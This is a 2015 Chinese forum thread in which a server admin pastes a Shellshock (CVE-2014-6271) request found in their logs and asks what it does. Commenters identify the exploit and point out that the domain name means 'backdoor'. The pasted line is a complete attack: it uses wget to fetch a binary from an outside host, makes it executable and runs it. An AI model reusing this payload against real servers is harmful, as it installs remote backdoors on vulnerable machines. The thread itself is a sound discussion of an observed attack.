类似下面这样:
Match1:{ :; }; /bin/bash -c .rm -rf /tmp/*;echo wget http://houmen.linux22.cn:123/houmen/linux223 -o /tmp/china.z-axjx. >> /tmp/run.sh;echo echo by china.z >> /tmp/run.sh;echo chmod 777 /tmp/china.z-axjx. >> /tmp/run.sh;echo /tmp/china.z-axjx. >> /tmp/run.sh;echo rm -rf /tmp/run.sh >> /tmp/run.sh;chmod 777 /tmp/run.sh;/tmp/run.sh.
今天发现有几个脚本来自IP:182.254.217.63,百度了一下
IP地址: 182.254.217.63上海市 腾讯集团
忽然觉得有点背后凉凉的,大鹅厂还有这种业务?
不过这个脚本一直没有下载成功过,不知道里面是干啥的, 有研究过的V友么?
1
wy315700 2015-08-11 08:41:25 +08:00
腾讯云的吧
|
2
belin520 2015-08-11 08:54:14 +08:00 via Android
没卵用,整个ip段扫描的吧,我的静态博客也有这
|
3
manhere 2015-08-11 09:01:42 +08:00 via iPhone 1
腾讯云上面的色情站不要太多,,,
使用腾讯云的话QQ还给域名绿盾认证 垃圾站首选 |
4
kenX 2015-08-11 09:46:29 +08:00
这是CVE-2014-6271的exp
|
5
mcone 2015-08-11 09:49:44 +08:00
人家都给你拼写的这么明确了 “houmen”,你还问这脚本是干啥的…………
另外腾讯云确实是我见到的出点名的最不讲究的,各种垃圾伪原创站、钓鱼站、色情站……目测还有不少肉鸡 |
6
dream7758521 2015-08-11 10:33:38 +08:00 via Android
后背凉,肾虚。
|
7
bydmm 2015-08-11 11:03:33 +08:00
|
8
paw 2015-08-11 17:06:59 +08:00
houmen ..... 我擦 以为是啥英语单词呢
放到词典里,,,,后门。,。 我擦 |
9
vmskipper 2015-08-11 17:24:52 +08:00
看到域名 犹如一股寒芒戳菊
|